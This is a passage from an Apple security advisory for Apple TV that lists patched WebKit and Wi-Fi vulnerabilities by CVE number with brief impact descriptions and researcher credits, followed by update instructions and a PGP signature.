Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: Processing maliciously crafted web content may lead to code  
execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab  
WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

Wi-Fi  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious application may disclose restricted memory  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26745: an anonymous researcher

Additional recognition

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

WebKit  
We would like to acknowledge James Lee, an anonymous researcher for  
their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TcACgkQeC9qKD1p  
rhiw7BAAy82XZ2+vjnjFB1FrZ7ZnKtM4pz8MMpX4ZTD2ytgkwXi0qnyzBdMe/w4p  
zrpedL4p/RfdDOiM/4kWBtiH62qetiXDcE8tBqN8WTE9rf55cX4jlXrHASohFI2q  
ErkAjo51j2fg8S7a+luyaZWzBUZqlghtzWjtFgaHOQAP5dDf+He92kDerbrIDQw9  
dg0nL4os0VFgWdX0EtFC7umK8iiTFbvtoEbLDLFODWweaJN8LOP/LHe71YzAryKg  
Dh9ItWqVdzkCOKWR8F96NnoBs7c6B4naqQkS4k2F/m6C6ckPb8LI18ss7oiD3eMB  
k7oo7+u1zQFRKmk0XlfH7awxtEHjYjjw3LT8ko9QJ8mEuspxoiwW7n1mINWa7Khp  
YoCe88xR06kfti4h6MJDSN6JpxSnikEyJzR4j4xGL6rWjqCj+XV9ejrt9EgF8BL2  
JZ+Oceoh23m7IqVoMe1Hzjf1X3nsxXJQEg/xxRwHRknAjSNtVJUKhT4/ioOc9pu6  
TROAHYdSO5yRLNUNpj9RlkBeDbXtiWgA2IEg0wcUPzwf3Uzt2Qw9zBFbMb1hPSht  
7zTIOtF4Ub+MD6cFuHbC7hL58pRmA4FzEczLG81BoGGaFOCD2QDt0/ySTFr1M+YD  
g2L2PlZNgxd0zetkTkZbvAwroMUTRSi1GqxAhVeKwbvW4XAN+yc=  
=G3ho  
-----END PGP SIGNATURE-----

Tag

#apple